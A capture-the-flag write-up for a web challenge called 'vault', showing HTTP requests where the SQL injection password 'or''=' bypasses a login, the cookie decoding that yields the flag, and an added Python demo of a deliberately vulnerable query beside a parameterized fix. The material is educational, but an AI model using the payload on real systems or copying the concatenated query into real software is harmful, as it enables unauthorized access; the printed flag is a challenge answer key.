Tags: sqli web
Rating:
# ▼▼▼vault (Web: 100, 193/696 = 27.8%)▼▼▼
This writeup is written by [**@kazkiti_ctf**](https://twitter.com/kazkiti_ctf)
```
i heard you are good at breaking codes, can you crack this vault?
http://104.154.106.182:9090
author: codacker
```
---
`http://104.154.106.182:9090`
↓ Access URL
## 【Try 1: admin/admin】
Log in with `username=admin&password=admin`
↓
```
POST /login.php HTTP/1.1
Host: 104.154.106.182:9090
Content-Type: application/x-www-form-urlencoded
username=admin&password=admin&submit=submit
```
↓
```
HTTP/1.1 200 OK
Date: Thu, 04 Apr 2019 13:05:27 GMT
Server: Apache/2.4.25 (Debian)
X-Powered-By: PHP/7.3.3
Vary: Accept-Encoding
Content-Length: 427
Connection: close
Content-Type: text/html; charset=UTF-8
<html>
<head>
<meta charset="utf-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<title>Login</title>
<meta name="viewport" content="width=device-width, initial-scale=1">
<link rel="stylesheet" type="text/css" media="screen" href="css/main.css">
</head>
<body>
<div class="main">
<h1 class="heading">
ACCESS DENIED </h1>
</div>
</body>
</html>
```
↓
Login failed...
---
## 【Try 2: SQL Injection】
```
POST /login.php HTTP/1.1
Host: 104.154.106.182:9090
Content-Type: application/x-www-form-urlencoded
username=admin&password='or''='&submit=submit
```
↓
```
HTTP/1.1 200 OK
Date: Thu, 04 Apr 2019 13:08:49 GMT
Server: Apache/2.4.25 (Debian)
X-Powered-By: PHP/7.3.3
Set-Cookie: SESSIONID=ZW5jcnlwdENURntpX0g0dDNfaW5KM2M3aTBuNX0%3D
Vary: Accept-Encoding
Content-Length: 465
Connection: close
Content-Type: text/html; charset=UTF-8
<html>
<head>
<meta charset="utf-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<title>Login</title>
<meta name="viewport" content="width=device-width, initial-scale=1">
<link rel="stylesheet" type="text/css" media="screen" href="css/main.css">
</head>
<body>
<div class="main">
<h1 class="heading">
ACCESS GRANTED
</h1>
</div>
</body>
</html>
```
↓
Login succeeded!! The response also sets `Set-Cookie: SESSIONID=ZW5jcnlwdENURntpX0g0dDNfaW5KM2M3aTBuNX0%3D`
↓
`ZW5jcnlwdENURntpX0g0dDNfaW5KM2M3aTBuNX0%3D`
↓ URL decode
`ZW5jcnlwdENURntpX0g0dDNfaW5KM2M3aTBuNX0=`
↓ base64 decode
`encryptCTF{i_H4t3_inJ3c7i0n5}`
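Added example (not part of the original writeup or the challenge's code): a constructed in-memory stand-in for the login query shows why the `'or''='` password above is accepted when input is concatenated into SQL, how a parameterized query rejects the same input, and how the two-layer (URL, then base64) cookie decoding above recovers the flag. The table schema and the admin password are hypothetical.

```python
import base64
import sqlite3
from urllib.parse import unquote


def make_db():
    """Constructed in-memory users table; the real schema is unknown."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (username TEXT, password TEXT)")
    # Hypothetical credential: the challenge's real password is never revealed.
    db.execute("INSERT INTO users VALUES ('admin', 'hypothetical-secret')")
    return db


def login_vulnerable(db, username, password):
    """User input concatenated into the SQL text (the flaw the writeup exploits).

    With password = 'or''=' the WHERE clause becomes
        username='admin' AND password='' or ''=''
    and since AND binds tighter than OR, the ''='' branch makes it true.
    """
    query = ("SELECT username FROM users WHERE username='%s' AND password='%s'"
             % (username, password))
    return db.execute(query).fetchone() is not None


def login_safe(db, username, password):
    """Parameterized query: the same bytes are compared as a literal string."""
    query = "SELECT username FROM users WHERE username=? AND password=?"
    return db.execute(query, (username, password)).fetchone() is not None


def decode_session_cookie(raw):
    """SESSIONID is URL-encoded base64; reverse both layers."""
    return base64.b64decode(unquote(raw)).decode()


if __name__ == "__main__":
    db = make_db()
    payload = "'or''='"
    print("vulnerable, admin/admin :", login_vulnerable(db, "admin", "admin"))
    print("vulnerable, injection   :", login_vulnerable(db, "admin", payload))
    print("parameterized, injection:", login_safe(db, "admin", payload))
    cookie = "ZW5jcnlwdENURntpX0g0dDNfaW5KM2M3aTBuNX0%3D"
    print("decoded SESSIONID       :", decode_session_cookie(cookie))
```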